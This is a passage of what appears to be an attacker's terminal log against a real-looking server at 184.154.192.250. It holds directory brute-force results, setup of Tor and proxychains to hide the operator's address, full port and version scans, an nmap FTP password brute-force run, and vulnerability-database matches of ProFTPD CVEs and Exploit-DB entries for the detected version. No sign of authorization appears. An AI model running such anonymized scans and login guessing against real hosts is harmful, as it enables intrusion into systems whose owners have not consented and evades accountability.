  1252. + http://184.154.192.250/blog/wp-admin/admin.pl (CODE:403|SIZE:954)
  1253. + http://184.154.192.250/blog/wp-admin/index.php (CODE:302|SIZE:0)
  1254.  
  1255. ---- Entering directory: http://184.154.192.250/blog/wp-content/ ----
  1256. + http://184.154.192.250/blog/wp-content/admin.pl (CODE:403|SIZE:954)
  1257. + http://184.154.192.250/blog/wp-content/index.php (CODE:200|SIZE:0)
  1258.  
  1259. ---- Entering directory: http://184.154.192.250/blog/wp-includes/ ----
  1260. + http://184.154.192.250/blog/wp-includes/admin.pl (CODE:403|SIZE:954)
  1261. + http://184.154.192.250/blog/wp-includes/index.php (CODE:301|SIZE:0)
  1262.  
  1263. ---- Entering directory: http://184.154.192.250/Blog/0/ ----
  1264. + http://184.154.192.250/Blog/0/index.php (CODE:301|SIZE:0)
  1265.  
  1266. ---- Entering directory: http://184.154.192.250/Blog/2011/ ----
  1267. + http://184.154.192.250/Blog/2011/13 (CODE:200|SIZE:13756)
  1268. + http://184.154.192.250/Blog/2011/14 (CODE:200|SIZE:13756)
  1269. + http://184.154.192.250/Blog/2011/15 (CODE:200|SIZE:13756)
  1270. + http://184.154.192.250/Blog/2011/20 (CODE:200|SIZE:13756)
  1271. + http://184.154.192.250/Blog/2011/21 (CODE:200|SIZE:13756)
  1272. + http://184.154.192.250/Blog/2011/22 (CODE:200|SIZE:13756)
  1273. + http://184.154.192.250/Blog/2011/23 (CODE:200|SIZE:13756)
  1274. + http://184.154.192.250/Blog/2011/24 (CODE:200|SIZE:13756)
  1275. + http://184.154.192.250/Blog/2011/25 (CODE:200|SIZE:13756)
  1276. + http://184.154.192.250/Blog/2011/30 (CODE:200|SIZE:13756)
  1277. + http://184.154.192.250/Blog/2011/32 (CODE:200|SIZE:13756)
  1278. + http://184.154.192.250/Blog/2011/42 (CODE:200|SIZE:13756)
  1279. + http://184.154.192.250/Blog/2011/50 (CODE:200|SIZE:13756)
  1280. + http://184.154.192.250/Blog/2011/51 (CODE:200|SIZE:13756)
  1281. + http://184.154.192.250/Blog/2011/64 (CODE:200|SIZE:13756)
  1282. + http://184.154.192.250/Blog/2011/96 (CODE:200|SIZE:13756)
  1283. + http://184.154.192.250/Blog/2011/atom (CODE:301|SIZE:0)
  1284. + http://184.154.192.250/Blog/2011/index.php (CODE:301|SIZE:0)
  1285. + http://184.154.192.250/Blog/2011/page1 (CODE:301|SIZE:0)
  1286. + http://184.154.192.250/Blog/2011/page2 (CODE:301|SIZE:0)
  1287. + http://184.154.192.250/Blog/2011/rdf (CODE:301|SIZE:0)
  1288. + http://184.154.192.250/Blog/2011/rss (CODE:301|SIZE:0)
  1289. + http://184.154.192.250/Blog/2011/rss2 (CODE:301|SIZE:0)
  1290.  
  1291. ---- Entering directory: http://184.154.192.250/Blog/2012/ ----
  1292. + http://184.154.192.250/Blog/2012/13 (CODE:200|SIZE:13756)
  1293. + http://184.154.192.250/Blog/2012/14 (CODE:200|SIZE:13756)
  1294. + http://184.154.192.250/Blog/2012/15 (CODE:200|SIZE:13756)
  1295. + http://184.154.192.250/Blog/2012/20 (CODE:200|SIZE:13756)
  1296. + http://184.154.192.250/Blog/2012/21 (CODE:200|SIZE:13756)
  1297. + http://184.154.192.250/Blog/2012/22 (CODE:200|SIZE:13756)
  1298. + http://184.154.192.250/Blog/2012/23 (CODE:200|SIZE:13756)
  1299. + http://184.154.192.250/Blog/2012/24 (CODE:200|SIZE:13756)
  1300. + http://184.154.192.250/Blog/2012/25 (CODE:200|SIZE:13756)
  1301. + http://184.154.192.250/Blog/2012/30 (CODE:200|SIZE:13756)
  1302. + http://184.154.192.250/Blog/2012/32 (CODE:200|SIZE:13756)
  1303. + http://184.154.192.250/Blog/2012/42 (CODE:200|SIZE:13756)
  1304. + http://184.154.192.250/Blog/2012/50 (CODE:200|SIZE:13756)
  1305. + http://184.154.192.250/Blog/2012/51 (CODE:200|SIZE:13756)
  1306. + http://184.154.192.250/Blog/2012/64 (CODE:200|SIZE:13756)
  1307. + http://184.154.192.250/Blog/2012/96 (CODE:200|SIZE:13756)
  1308. + http://184.154.192.250/Blog/2012/atom (CODE:301|SIZE:0)
  1309. + http://184.154.192.250/Blog/2012/index.php (CODE:301|SIZE:0)
  1310. + http://184.154.192.250/Blog/2012/page1 (CODE:301|SIZE:0)
  1311. + http://184.154.192.250/Blog/2012/page2 (CODE:301|SIZE:0)
  1312. + http://184.154.192.250/Blog/2012/rdf (CODE:301|SIZE:0)
  1313. + http://184.154.192.250/Blog/2012/rss (CODE:301|SIZE:0)
  1314. + http://184.154.192.250/Blog/2012/rss2 (CODE:301|SIZE:0)
  1315.  
  1316. ---- Entering directory: http://184.154.192.250/Blog/embed/ ----
  1317. + http://184.154.192.250/Blog/embed/index.php (CODE:301|SIZE:0)
  1318.  
  1319. ---- Entering directory: http://184.154.192.250/Blog/feed/ ----
  1320. + http://184.154.192.250/Blog/feed/feed (CODE:301|SIZE:0)
  1321. + http://184.154.192.250/Blog/feed/index.php (CODE:301|SIZE:0)
  1322. + http://184.154.192.250/Blog/feed/rss (CODE:301|SIZE:0)
  1323. + http://184.154.192.250/Blog/feed/rss2 (CODE:301|SIZE:0)
  1324.  
  1325. ---- Entering directory: http://184.154.192.250/Blog/uncategorized/ ----
  1326. + http://184.154.192.250/Blog/uncategorized/atom (CODE:301|SIZE:0)
  1327. + http://184.154.192.250/Blog/uncategorized/index.php (CODE:301|SIZE:0)
  1328. + http://184.154.192.250/Blog/uncategorized/page1 (CODE:301|SIZE:0)
  1329. + http://184.154.192.250/Blog/uncategorized/rdf (CODE:301|SIZE:0)
  1330. + http://184.154.192.250/Blog/uncategorized/rss (CODE:301|SIZE:0)
  1331. + http://184.154.192.250/Blog/uncategorized/rss2 (CODE:301|SIZE:0)
  1332.  
  1333. ---- Entering directory: http://184.154.192.250/contact-us/_notes/ ----
  1334. + http://184.154.192.250/contact-us/_notes/admin.pl (CODE:403|SIZE:954)
  1335. + http://184.154.192.250/contact-us/_notes/atom (CODE:301|SIZE:0)
  1336. + http://184.154.192.250/contact-us/_notes/index.php (CODE:301|SIZE:0)
  1337. + http://184.154.192.250/contact-us/_notes/rdf (CODE:301|SIZE:0)
  1338. + http://184.154.192.250/contact-us/_notes/rss (CODE:301|SIZE:0)
  1339. + http://184.154.192.250/contact-us/_notes/rss2 (CODE:301|SIZE:0)
  1340.  
  1341. ---- Entering directory: http://184.154.192.250/feed/atom/ ----
  1342. + http://184.154.192.250/feed/atom/atom (CODE:301|SIZE:0)
  1343. + http://184.154.192.250/feed/atom/feed (CODE:301|SIZE:0)
  1344. + http://184.154.192.250/feed/atom/index.php (CODE:301|SIZE:0)
  1345. + http://184.154.192.250/feed/atom/rdf (CODE:301|SIZE:0)
  1346. + http://184.154.192.250/feed/atom/rss (CODE:301|SIZE:0)
  1347. + http://184.154.192.250/feed/atom/rss2 (CODE:301|SIZE:0)
  1348.  
  1349. ---- Entering directory: http://184.154.192.250/feed/rdf/ ----
  1350. + http://184.154.192.250/feed/rdf/atom (CODE:301|SIZE:0)
  1351. + http://184.154.192.250/feed/rdf/feed (CODE:301|SIZE:0)
  1352. + http://184.154.192.250/feed/rdf/index.php (CODE:301|SIZE:0)
  1353. + http://184.154.192.250/feed/rdf/rdf (CODE:301|SIZE:0)
  1354. + http://184.154.192.250/feed/rdf/rss (CODE:301|SIZE:0)
  1355. + http://184.154.192.250/feed/rdf/rss2 (CODE:301|SIZE:0)
  1356.  
  1357. ---- Entering directory: http://184.154.192.250/include/_notes/ ----
  1358. + http://184.154.192.250/include/_notes/admin.pl (CODE:403|SIZE:954)
  1359. + http://184.154.192.250/include/_notes/atom (CODE:301|SIZE:0)
  1360. + http://184.154.192.250/include/_notes/index.php (CODE:301|SIZE:0)
  1361. + http://184.154.192.250/include/_notes/rdf (CODE:301|SIZE:0)
  1362. + http://184.154.192.250/include/_notes/rss (CODE:301|SIZE:0)
  1363. + http://184.154.192.250/include/_notes/rss2 (CODE:301|SIZE:0)
  1364.  
  1365. ---- Entering directory: http://184.154.192.250/test/file/ ----
  1366. + http://184.154.192.250/test/file/admin.pl (CODE:403|SIZE:954)
  1367. + http://184.154.192.250/test/file/atom (CODE:301|SIZE:0)
  1368. + http://184.154.192.250/test/file/index.php (CODE:301|SIZE:0)
  1369. + http://184.154.192.250/test/file/rdf (CODE:301|SIZE:0)
  1370. + http://184.154.192.250/test/file/rss (CODE:301|SIZE:0)
  1371. + http://184.154.192.250/test/file/rss2 (CODE:301|SIZE:0)
  1372.  
  1373. ---- Entering directory: http://184.154.192.250/test/images/ ----
  1374. + http://184.154.192.250/test/images/admin.pl (CODE:403|SIZE:954)
  1375. + http://184.154.192.250/test/images/atom (CODE:301|SIZE:0)
  1376. + http://184.154.192.250/test/images/index.php (CODE:301|SIZE:0)
  1377. + http://184.154.192.250/test/images/rdf (CODE:301|SIZE:0)
  1378. + http://184.154.192.250/test/images/rss (CODE:301|SIZE:0)
  1379. + http://184.154.192.250/test/images/rss2 (CODE:301|SIZE:0)
  1380. + http://184.154.192.250/test/images/Thumbs.db (CODE:200|SIZE:27648)
  1381.  
  1382. ---- Entering directory: http://184.154.192.250/time/Image/ ----
  1383. + http://184.154.192.250/time/Image/admin.pl (CODE:403|SIZE:954)
  1384. + http://184.154.192.250/time/Image/atom (CODE:301|SIZE:0)
  1385. + http://184.154.192.250/time/Image/index.php (CODE:301|SIZE:0)
  1386. + http://184.154.192.250/time/Image/rdf (CODE:301|SIZE:0)
  1387. + http://184.154.192.250/time/Image/rss (CODE:301|SIZE:0)
  1388. + http://184.154.192.250/time/Image/rss2 (CODE:301|SIZE:0)
  1389.  
  1390. ---- Entering directory: http://184.154.192.250/uncategorized/feed/ ----
  1391. + http://184.154.192.250/uncategorized/feed/feed (CODE:301|SIZE:0)
  1392. + http://184.154.192.250/uncategorized/feed/index.php (CODE:301|SIZE:0)
  1393. + http://184.154.192.250/uncategorized/feed/rss (CODE:301|SIZE:0)
  1394. + http://184.154.192.250/uncategorized/feed/rss2 (CODE:301|SIZE:0)
  1395.  
  1396. ---- Entering directory: http://184.154.192.250/WEB-INF/classes/ ----
  1397. + http://184.154.192.250/WEB-INF/classes/admin.pl (CODE:403|SIZE:954)
  1398. + http://184.154.192.250/WEB-INF/classes/atom (CODE:301|SIZE:0)
  1399. + http://184.154.192.250/WEB-INF/classes/index.php (CODE:301|SIZE:0)
  1400. + http://184.154.192.250/WEB-INF/classes/rdf (CODE:301|SIZE:0)
  1401. + http://184.154.192.250/WEB-INF/classes/rss (CODE:301|SIZE:0)
  1402. + http://184.154.192.250/WEB-INF/classes/rss2 (CODE:301|SIZE:0)
  1403.  
  1404. ---- Entering directory: http://184.154.192.250/WEB-INF/lib/ ----
  1405. + http://184.154.192.250/WEB-INF/lib/admin.pl (CODE:403|SIZE:954)
  1406. + http://184.154.192.250/WEB-INF/lib/atom (CODE:301|SIZE:0)
  1407. + http://184.154.192.250/WEB-INF/lib/index.php (CODE:301|SIZE:0)
  1408. + http://184.154.192.250/WEB-INF/lib/rdf (CODE:301|SIZE:0)
  1409. + http://184.154.192.250/WEB-INF/lib/rss (CODE:301|SIZE:0)
  1410. + http://184.154.192.250/WEB-INF/lib/rss2 (CODE:301|SIZE:0)
  1411.  
  1412. ---- Entering directory: http://184.154.192.250/works/flash/ ----
  1413. + http://184.154.192.250/works/flash/admin.pl (CODE:403|SIZE:954)
  1414. + http://184.154.192.250/works/flash/atom (CODE:301|SIZE:0)
  1415. + http://184.154.192.250/works/flash/index.php (CODE:301|SIZE:0)
  1416. + http://184.154.192.250/works/flash/rdf (CODE:301|SIZE:0)
  1417. + http://184.154.192.250/works/flash/rss (CODE:301|SIZE:0)
  1418. + http://184.154.192.250/works/flash/rss2 (CODE:301|SIZE:0)
  1419.  
  1420. ---- Entering directory: http://184.154.192.250/works/images/ ----
  1421. + http://184.154.192.250/works/images/admin.pl (CODE:403|SIZE:954)
  1422. + http://184.154.192.250/works/images/atom (CODE:301|SIZE:0)
  1423.  
  1424.  
  1425.  
  1426. INSTALL TOR
  1427.  
  1428. root@blackbox:~# apt-get install tor
  1429.  
  1430. START TOR
  1431.  
  1432. root@blackbox:~# service tor start
  1433.  
  1434. CHECK TOR STATUS
  1435.  
  1436. root@blackbox:~# service tor status
  1437.  
  1438.  
  1439. CHECK IF ANONYMITY WORKS
  1440.  
  1441. root@blackbox:~# proxychains curl http://icanhazip.com
  1442. ProxyChains-3.1 (http://proxychains.sf.net)
  1443. |DNS-request| icanhazip.com
  1444. |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
  1445. |DNS-response| icanhazip.com is 104.20.16.242
  1446. |S-chain|-<>-127.0.0.1:9050-<><>-104.20.16.242:80-<><>-OK
  1447. 89.234.157.254
  1448.  
  1449.  
  1450. START NMAP THROUGH PROXYCHAINS
  1451.  
  1452. root@blackbox:/opt# proxychains nmap -p 1-65535 -T4 -A -v 184.154.192.250 -Pn --open
  1453.  
  1454. Discovered open port 443/tcp on 184.154.192.250
  1455. Discovered open port 110/tcp on 184.154.192.250
  1456. Discovered open port 995/tcp on 184.154.192.250
  1457. Discovered open port 53/tcp on 184.154.192.250
  1458. Discovered open port 111/tcp on 184.154.192.250
  1459. Discovered open port 554/tcp on 184.154.192.250
  1460. Discovered open port 143/tcp on 184.154.192.250
  1461. Discovered open port 22/tcp on 184.154.192.250
  1462. Discovered open port 25/tcp on 184.154.192.250
  1463. Discovered open port 993/tcp on 184.154.192.250
  1464. Discovered open port 3306/tcp on 184.154.192.250
  1465. Discovered open port 80/tcp on 184.154.192.250
  1466. Discovered open port 587/tcp on 184.154.192.250
  1467. Discovered open port 21/tcp on 184.154.192.250
  1468. Discovered open port 106/tcp on 184.154.192.250
  1469. Discovered open port 746/tcp on 184.154.192.250
  1470. Discovered open port 7070/tcp on 184.154.192.250
  1471. Discovered open port 8443/tcp on 184.154.192.250
  1472. Discovered open port 465/tcp on 184.154.192.250
  1473. Discovered open port 8880/tcp on 184.154.192.250
  1474.  
  1475.  
  1476. NMAP NSE FTP
  1477.  
  1478. root@blackbox:/opt# ls /usr/share/nmap/scripts/ | grep ftp
  1479. ftp-anon.nse
  1480. ftp-bounce.nse
  1481. ftp-brute.nse
  1482. ftp-libopie.nse
  1483. ftp-proftpd-backdoor.nse
  1484. ftp-syst.nse
  1485. ftp-vsftpd-backdoor.nse
  1486. ftp-vuln-cve2010-4221.nse
  1487. tftp-enum.nse
  1488.  
  1489. root@blackbox:/opt# proxychains nmap -oN ftp.nmap --script "ftp-brute" --script-args= -d -Pn -v -p 21 184.154.192.250
  1490.  
  1491. PORT STATE SERVICE REASON
  1492. 21/tcp open ftp syn-ack ttl 49
  1493. | ftp-brute:
  1494. | Accounts: No valid accounts found
  1495. |_ Statistics: Performed 563 guesses in 618 seconds, average tps: 1.1
  1496. Final times for host: srtt: 145410 rttvar: 145410 to: 727050
  1497.  
  1498.  
  1499. root@blackbox:~# nmap -sV -Pn 184.154.192.250 --open
  1500. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:21 CST
  1501. Nmap scan report for server.etours.cn (184.154.192.250)
  1502. Host is up (0.15s latency).
  1503. Not shown: 981 closed ports, 1 filtered port
  1504. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1505. PORT STATE SERVICE VERSION
  1506. 21/tcp open ftp ProFTPD 1.3.3e
  1507. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1508. 25/tcp open smtp qmail smtpd
  1509. 53/tcp open domain (unknown banner: none)
  1510. 80/tcp open http Apache httpd (PleskLin)
  1511. 106/tcp open pop3pw poppassd
  1512. 110/tcp open pop3 Courier pop3d
  1513. 111/tcp open rpcbind 2 (RPC #100000)
  1514. 143/tcp open imap Courier Imapd (released 2004)
  1515. 443/tcp open ssl/https?
  1516. 465/tcp open ssl/smtps?
  1517. 554/tcp open tcpwrapped
  1518. 587/tcp open smtp qmail smtpd
  1519. 993/tcp open ssl/imaps?
  1520. 995/tcp open ssl/pop3s?
  1521. 3306/tcp open mysql MySQL 5.0.77
  1522. 7070/tcp open tcpwrapped
  1523. 8443/tcp open ssl/https-alt sw-cp-server
  1524. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  1525. SF-Port53-TCP:V=7.80%I=7%D=1/22%Time=5E28AEC7%P=x86_64-pc-linux-gnu%r(DNSV
  1526. SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
  1527. SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
  1528. SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
  1529. Service Info: Host: localhost.localdomain; OS: Unix
  1530.  
  1531. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1532. Nmap done: 1 IP address (1 host up) scanned in 39.36 seconds
  1533.  
  1534.  
  1535. root@blackbox:/opt# cd /usr/share/nmap/scripts/
  1536. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/vulnersCom/nmap-vulners.git
  1537. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/scipag/vulscan.git
  1538. root@blackbox:/usr/share/nmap/scripts# ls -la vulscan/*.csv
  1539. -rw-r--r-- 1 root root 16756993 Jan 21 04:59 vulscan/cve.csv
  1540. -rw-r--r-- 1 root root 1864748 Jan 21 04:59 vulscan/exploitdb.csv
  1541. -rw-r--r-- 1 root root 1524310 Jan 21 04:59 vulscan/openvas.csv
  1542. -rw-r--r-- 1 root root 6718903 Jan 21 04:59 vulscan/osvdb.csv
  1543. -rw-r--r-- 1 root root 7001128 Jan 21 04:59 vulscan/scipvuldb.csv
  1544. -rw-r--r-- 1 root root 7227028 Jan 21 04:59 vulscan/securityfocus.csv
  1545. -rw-r--r-- 1 root root 1826138 Jan 21 04:59 vulscan/securitytracker.csv
  1546. -rw-r--r-- 1 root root 4576711 Jan 21 04:59 vulscan/xforce.csv
  1547.  
  1548. root@blackbox:/usr/share/nmap/scripts# cd vulscan/
  1549. root@blackbox:/usr/share/nmap/scripts/vulscan# cd utilities/
  1550. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd updater/
  1551. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# chmod +x updateFiles.sh
  1552. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# ./updateFiles.sh
  1553. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/cve.csv...
  1554. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/exploitdb.csv...
  1555. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/openvas.csv...
  1556. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/osvdb.csv...
  1557. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/scipvuldb.csv...
  1558. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securityfocus.csv...
  1559. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securitytracker.csv...
  1560. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/xforce.csv...
  1561. Returning 0, as no files have been updated, but script ran successfully
  1562.  
  1563.  
  1564. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# cd ..
  1565. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd ..
  1566. root@blackbox:/usr/share/nmap/scripts/vulscan# cd ..
  1567.  
  1568.  
  1569. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p21 184.154.192.250
  1570. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1571. Nmap scan report for server.etours.cn (184.154.192.250)
  1572. Host is up (0.037s latency).
  1573.  
  1574. PORT STATE SERVICE VERSION
  1575. 21/tcp open ftp ProFTPD 1.3.3e
  1576. Service Info: OS: Unix
  1577.  
  1578. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1579. Nmap done: 1 IP address (1 host up) scanned in 4.06 seconds
  1580.  
  1581. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p22 184.154.192.250
  1582. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1583. Nmap scan report for server.etours.cn (184.154.192.250)
  1584. Host is up (0.036s latency).
  1585.  
  1586. PORT STATE SERVICE VERSION
  1587. 22/tcp open tcpwrapped
  1588.  
  1589. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1590. Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
  1591.  
  1592.  
  1593. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p21 184.154.192.250
  1594. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1595. Nmap scan report for server.etours.cn (184.154.192.250)
  1596. Host is up (0.036s latency).
  1597.  
  1598. PORT STATE SERVICE VERSION
  1599. 21/tcp open ftp ProFTPD 1.3.3e
  1600. | vulscan: VulDB - https://vuldb.com:
  1601. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  1602. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  1603. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  1604. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  1605. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  1606. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  1607. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  1608. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  1609. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  1610. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  1611. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  1612. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  1613. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  1614. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  1615. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  1616. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  1617. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  1618. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  1619. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  1620. |
  1621. | MITRE CVE - https://cve.mitre.org:
  1622. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  1623. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  1624. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  1625. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  1626. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  1627. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  1628. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  1629. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  1630. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  1631. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  1632. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  1633. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  1634. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  1635. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  1636. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  1637. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  1638. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  1639. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  1640. |
  1641. | SecurityFocus - https://www.securityfocus.com/bid/:
  1642. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1643. |
  1644. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1645. | [80980] ProFTPD FTP commands symlink
  1646. | [71226] ProFTPD pool code execution
  1647. | [65207] ProFTPD mod_sftp module denial of service
  1648. | [64495] ProFTPD sql_prepare_where() buffer overflow
  1649. | [63658] ProFTPD FTP server backdoor
  1650. | [63407] mod_sql module for ProFTPD buffer overflow
  1651. | [63155] ProFTPD pr_data_xfer denial of service
  1652. | [62909] ProFTPD mod_site_misc directory traversal
  1653. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  1654. | [53936] ProFTPD mod_tls SSL certificate security bypass
  1655. | [48951] ProFTPD mod_sql username percent SQL injection
  1656. | [48558] ProFTPD NLS support SQL injection protection bypass
  1657. | [45274] ProFTPD URL cross-site request forgery
  1658. | [33733] ProFTPD Auth API security bypass
  1659. | [31461] ProFTPD mod_radius buffer overflow
  1660. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  1661. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  1662. | [30147] ProFTPD sreplace() buffer overflow
  1663. | [21530] ProFTPD mod_sql format string attack
  1664. | [21528] ProFTPD shutdown message format string attack
  1665. | [19410] GProFTPD file name format string attack
  1666. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  1667. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  1668. | [16038] ProFTPD CIDR entry ACL bypass
  1669. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  1670. | [12369] ProFTPD mod_sql SQL injection
  1671. | [12200] ProFTPD ASCII file newline buffer overflow
  1672. | [10932] ProFTPD long PASS command buffer overflow
  1673. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  1674. | [7818] ProFTPD ls &quot
  1675. | [7816] ProFTPD file globbing denial of service
  1676. | [7126] ProFTPD fails to resolve hostnames
  1677. | [6433] ProFTPD format string
  1678. | [6209] proFTPD /var symlink
  1679. | [6208] ProFTPD contains configuration error in postinst script when running as root
  1680. | [5801] proftpd memory leak when using SIZE or USER commands
  1681. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  1682. |
  1683. | Exploit-DB - https://www.exploit-db.com:
  1684. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  1685. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
